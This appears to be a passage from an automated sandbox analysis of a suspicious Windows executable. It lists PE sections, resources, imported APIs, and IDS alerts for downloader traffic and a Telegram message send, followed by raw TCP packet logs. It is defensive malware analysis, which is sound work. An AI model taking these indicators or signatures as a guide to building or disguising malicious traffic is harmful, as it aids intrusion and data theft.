IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6230	0x6400	1ac97b0b8e41e1ffbb716878bb5109f2	False	0.6699609375	data	6.441889952551939	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1274	0x1400	b8e42f3d3b81b0e2a4080ab31bc2d1f4	False	0.4337890625	data	5.061067348371254	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x399078	0x600	be2892f1b11a971e0c6c4e83000268f5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a4000	0xf000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3b3000	0x2a768	0x2a800	0cb6c80894f545860470303df9b92eb7	False	0.3268037683823529	data	4.893333095662434	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3b3400	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2678782680705075
RT_ICON	0x3c3c28	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.3491959217994534
RT_ICON	0x3cd0d0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.36455637707948246
RT_ICON	0x3d2558	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.3328412848370335
RT_ICON	0x3d6780	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.41068464730290455
RT_ICON	0x3d8d28	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4584896810506567
RT_ICON	0x3d9dd0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5255863539445629
RT_ICON	0x3dac78	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5389344262295082
RT_ICON	0x3db600	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.5577617328519856
RT_ICON	0x3dbea8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.5011520737327189
RT_ICON	0x3dc570	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.375
RT_ICON	0x3dcad8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5868794326241135
RT_DIALOG	0x3dcf40	0x120	data	English	United States	0.53125
RT_DIALOG	0x3dd060	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x3dd180	0xf8	data	English	United States	0.6330645161290323
RT_DIALOG	0x3dd278	0xa0	data	English	United States	0.6125
RT_DIALOG	0x3dd318	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3dd378	0xae	data	English	United States	0.6609195402298851
RT_MANIFEST	0x3dd428	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-07T22:34:02.916905+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49690	142.250.181.238	443	TCP
2025-03-07T22:34:09.914140+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49692	132.226.8.169	80	TCP
2025-03-07T22:34:12.945457+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49692	132.226.8.169	80	TCP
2025-03-07T22:34:15.221143+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49694	104.21.16.1	443	TCP
2025-03-07T22:34:16.086330+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49695	132.226.8.169	80	TCP
2025-03-07T22:34:22.502330+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49698	104.21.16.1	443	TCP
2025-03-07T22:34:29.193488+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49702	104.21.16.1	443	TCP
2025-03-07T22:34:32.251185+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49704	104.21.16.1	443	TCP
2025-03-07T22:34:42.727143+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.6	49709	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 22:34:00.257411957 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:00.257462978 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:00.257525921 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:00.269963980 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:00.269983053 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:02.176140070 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:02.176208019 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:02.177212954 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:02.177272081 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:02.240549088 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:02.240576982 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:02.240957022 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:02.241012096 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:02.244680882 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:02.288331032 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:02.916949034 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:02.917038918 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:02.917100906 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:02.917129040 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:02.950706959 CET	49690	443	192.168.2.6	142.250.181.238
Mar 7, 2025 22:34:02.950752020 CET	443	49690	142.250.181.238	192.168.2.6
Mar 7, 2025 22:34:02.995064974 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:02.995114088 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:02.995177984 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:02.995862007 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:02.995877981 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:04.817409039 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:04.817595959 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:04.829153061 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:04.829190969 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:04.829442024 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:04.829509020 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:04.829914093 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:04.876328945 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.685369968 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.685524940 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.698528051 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.698604107 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.711893082 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.711961031 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.711971998 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.712017059 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.776901007 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.776952982 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.776992083 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.777076006 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.777086020 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.777101040 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.777264118 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.792469025 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.792628050 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.795370102 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.795424938 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.795429945 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.795475006 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.808556080 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.808716059 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.808722019 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.808773041 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.816329956 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.816411018 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.816417933 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.816466093 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.819402933 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.819468021 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.819473982 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.819515944 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.831981897 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.832156897 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.832163095 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.832211018 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.838711023 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.838794947 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.838813066 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.838856936 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.847280979 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.847398043 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.847413063 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.847465038 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.852895975 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.852962971 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.852974892 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.853022099 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.860778093 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.860852957 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.869365931 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.869422913 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.869426966 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.869436026 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.869473934 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.882021904 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.882193089 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.882200956 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.882252932 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.887809992 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.887922049 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.887953043 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.887994051 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.891968012 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.892066002 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.892077923 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.892123938 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.907166004 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.907226086 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.907234907 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.907285929 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.911663055 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.911715984 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.911721945 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.911763906 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.919404984 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.919455051 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.919487953 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.919500113 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.919512987 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.919555902 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.924881935 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.924942017 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.924947023 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.924993038 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.938756943 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.938869953 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.938882113 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.939052105 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.945415974 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.945507050 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.945518017 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.945561886 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.947945118 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.948013067 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.948019028 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.948060989 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.957007885 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.957120895 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.957133055 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.957180023 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.972157001 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.972202063 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.972244024 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.972281933 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.973555088 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.973762035 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.973768950 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.973819971 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.976581097 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.976643085 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.976648092 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.976687908 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.983212948 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.983263016 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.983270884 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.983306885 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.998330116 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.998373032 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.999556065 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.999600887 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:07.999608994 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:07.999651909 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.001020908 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.001085997 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.001091003 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.001133919 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.008368015 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.008414984 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.008414984 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.008426905 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.008462906 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.014089108 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.014132023 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.014137983 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.014182091 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.020133018 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.020178080 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.020184040 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.020222902 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.028557062 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.028599977 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.028605938 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.028649092 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.031924009 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.032601118 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.032608986 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.032649040 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.033154964 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.033196926 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.033201933 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.033242941 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.042773962 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.042810917 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.042831898 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.042980909 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.044090033 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.044130087 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.044239998 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.044329882 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.046931982 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.046976089 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.047077894 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.047116995 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.056855917 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.056899071 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.056906939 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.056945086 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.062670946 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.062714100 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.062774897 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.062810898 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.064088106 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.064127922 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.064163923 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.064199924 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.066907883 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.066956043 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.066962957 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.067003012 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.069677114 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.069716930 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.069721937 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.069760084 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.090466976 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.090512037 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.090521097 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.090527058 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.090544939 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.090565920 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.092606068 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.092650890 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.095321894 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.095523119 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.095527887 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.095643044 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.108344078 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.108386993 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.108397007 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.108437061 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.109447956 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.109488964 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.109493971 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.109529972 CET	49691	443	192.168.2.6	142.250.184.225
